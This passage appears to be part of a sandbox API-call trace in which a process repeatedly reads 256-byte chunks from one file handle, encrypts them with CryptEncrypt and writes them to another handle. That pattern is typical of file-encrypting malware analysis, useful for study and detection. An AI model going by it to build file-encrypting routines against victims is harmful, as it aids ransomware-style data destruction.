lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.505] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.505] GetLastError () returned 0x0 [0204.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.505] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.505] GetLastError () returned 0x0 [0204.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.505] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.505] GetLastError () returned 0x0 [0204.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.505] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.505] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.505] GetLastError () returned 0x0 [0204.505] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.506] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.506] GetLastError () returned 0x0 [0204.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.506] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.506] GetLastError () returned 0x0 [0204.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.506] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.506] GetLastError () returned 0x0 [0204.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.506] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.506] GetLastError () returned 0x0 [0204.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.506] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.506] GetLastError () returned 0x0 [0204.506] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.506] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.506] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.507] GetLastError () returned 0x0 [0204.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.507] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.507] GetLastError () returned 0x0 [0204.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.507] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.507] GetLastError () returned 0x0 [0204.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.507] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.507] GetLastError () returned 0x0 [0204.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.507] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.507] GetLastError () returned 0x0 [0204.507] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.507] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.507] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.508] GetLastError () returned 0x0 [0204.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.508] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.508] GetLastError () returned 0x0 [0204.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.508] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.508] GetLastError () returned 0x0 [0204.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.508] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.508] GetLastError () returned 0x0 [0204.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.508] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.508] GetLastError () returned 0x0 [0204.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.508] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.508] GetLastError () returned 0x0 [0204.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.509] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.509] GetLastError () returned 0x0 [0204.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.509] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.509] GetLastError () returned 0x0 [0204.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.509] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.509] GetLastError () returned 0x0 [0204.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.509] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.509] GetLastError () returned 0x0 [0204.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.509] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.509] GetLastError () returned 0x0 [0204.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.509] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.510] GetLastError () returned 0x0 [0204.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.510] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.510] GetLastError () returned 0x0 [0204.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.510] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.510] GetLastError () returned 0x0 [0204.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.510] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.510] GetLastError () returned 0x0 [0204.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.510] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.510] GetLastError () returned 0x0 [0204.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.510] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.510] GetLastError () returned 0x0 [0204.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.511] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x2977fd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0204.511] GetLastError () returned 0x0 [0204.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x2977fd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2977fd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0204.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2894780, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2894780*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0204.511] CryptEncrypt (in: 